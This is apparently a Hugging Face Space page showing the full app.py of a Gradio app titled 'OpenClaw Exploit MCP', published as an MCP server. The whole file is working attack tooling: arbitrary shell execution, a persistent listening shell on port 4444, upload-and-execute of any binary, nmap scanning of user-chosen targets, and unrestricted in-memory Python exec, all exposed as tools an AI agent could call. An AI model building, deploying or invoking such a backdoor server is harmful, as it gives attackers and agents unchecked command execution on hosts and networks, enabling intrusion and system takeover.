Spaces:

BlacktechY
/

Uuu

Sleeping

Uuu / app.py

Marvin Wiesner

Update app.py

d327d4c verified 2 months ago

4.66 kB

	import gradio as gr
	import subprocess
	import socket
	import threading
	import os
	import requests
	import time

	# --- Command Execution ---
	def run_command(cmd: str) -> str:
	"""Führt beliebige Shell-Befehle aus."""
	try:
	output = subprocess.check_output(
	cmd,
	shell=True,
	stderr=subprocess.STDOUT,
	text=True
	)
	return output
	except Exception as e:
	return f"Error: {str(e)}"

	# --- Reverse Shell (Persistent) ---
	def start_reverse_shell(port: int = 4444) -> str:
	"""Startet eine persistente Reverse Shell."""
	def listener():
	while True:
	try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind(("0.0.0.0", port))
	s.listen(1)
	conn, addr = s.accept()
	conn.send(b"OpenClaw Exploit Shell\n")
	while True:
	cmd = conn.recv(1024).decode().strip()
	if not cmd:
	break
	try:
	output = subprocess.check_output(
	cmd,
	shell=True,
	stderr=subprocess.STDOUT,
	text=True
	)
	conn.send(output.encode())
	except Exception as e:
	conn.send(str(e).encode())
	conn.close()
	except Exception as e:
	time.sleep(5) # Warte 5 Sekunden und versuche neu
	threading.Thread(target=listener, daemon=True).start()
	return f"Reverse Shell auf Port {port} aktiv. Verbinde dich mit: `nc <SPACE-URL> {port}`"

	# --- File Upload & Execution ---
	def execute_uploaded_file(file):
	"""Führt hochgeladene Dateien aus (z. B. Skripte, Binaries)."""
	if not file:
	return "Keine Datei hochgeladen."
	file_path = f"/tmp/{file.name}"
	with open(file_path, "wb") as f:
	f.write(file.read())
	os.chmod(file_path, 0o755) # Ausführbar machen
	try:
	output = subprocess.check_output(
	f"{file_path}",
	shell=True,
	stderr=subprocess.STDOUT,
	text=True
	)
	return f"Datei ausgeführt:\n{output}"
	except Exception as e:
	return f"Fehler: {str(e)}"

	# --- Network Scanner (Nmap) ---
	def scan_network(target: str) -> str:
	"""Führt einen Nmap-Scan durch."""
	try:
	output = subprocess.check_output(
	f"nmap -sV -T4 {target}",
	shell=True,
	stderr=subprocess.STDOUT,
	text=True
	)
	return output
	except Exception as e:
	return f"Scan fehlgeschlagen: {str(e)}"

	# --- Fileless Code Execution ---
	def fileless_execute(code: str) -> str:
	"""Führt Python-Code direkt im Speicher aus (fileless)."""
	try:
	exec_globals = {}
	exec(code, exec_globals)
	return f"Code ausgeführt. Ergebnis: {exec_globals.get('__builtins__', {}).get('output', 'Kein Output')}"
	except Exception as e:
	return f"Fehler: {str(e)}"

	# --- Gradio UI ---
	with gr.Blocks() as demo:
	gr.Markdown("# OpenClaw Exploit MCP")
	gr.Markdown("Command Execution, Reverse Shell, File Upload/Execution, Network Scanning")

	with gr.Tab("Command Execution"):
	cmd_input = gr.Textbox(label="Shell-Befehl")
	cmd_output = gr.Textbox(label="Output")
	gr.Button("Ausführen").click(run_command, inputs=cmd_input, outputs=cmd_output)

	with gr.Tab("Reverse Shell"):
	port_input = gr.Number(label="Port", value=4444)
	shell_output = gr.Textbox(label="Status")
	gr.Button("Starten").click(start_reverse_shell, inputs=port_input, outputs=shell_output)

	with gr.Tab("File Upload & Execution"):
	file_input = gr.File(label="Datei hochladen")
	file_output = gr.Textbox(label="Output")
	gr.Button("Ausführen").click(execute_uploaded_file, inputs=file_input, outputs=file_output)

	with gr.Tab("Network Scanner"):
	target_input = gr.Textbox(label="Ziel (z. B. 192.168.1.1)", value="127.0.0.1")
	scan_output = gr.Textbox(label="Scan-Ergebnis")
	gr.Button("Scannen").click(scan_network, inputs=target_input, outputs=scan_output)

	with gr.Tab("Fileless Execution"):
	code_input = gr.Textbox(label="Python-Code", placeholder="print('Hello, Exploit!')")
	code_output = gr.Textbox(label="Output")
	gr.Button("Ausführen").click(fileless_execute, inputs=code_input, outputs=code_output)

	# MCP-Server aktivieren
	demo.launch(mcp_server=True)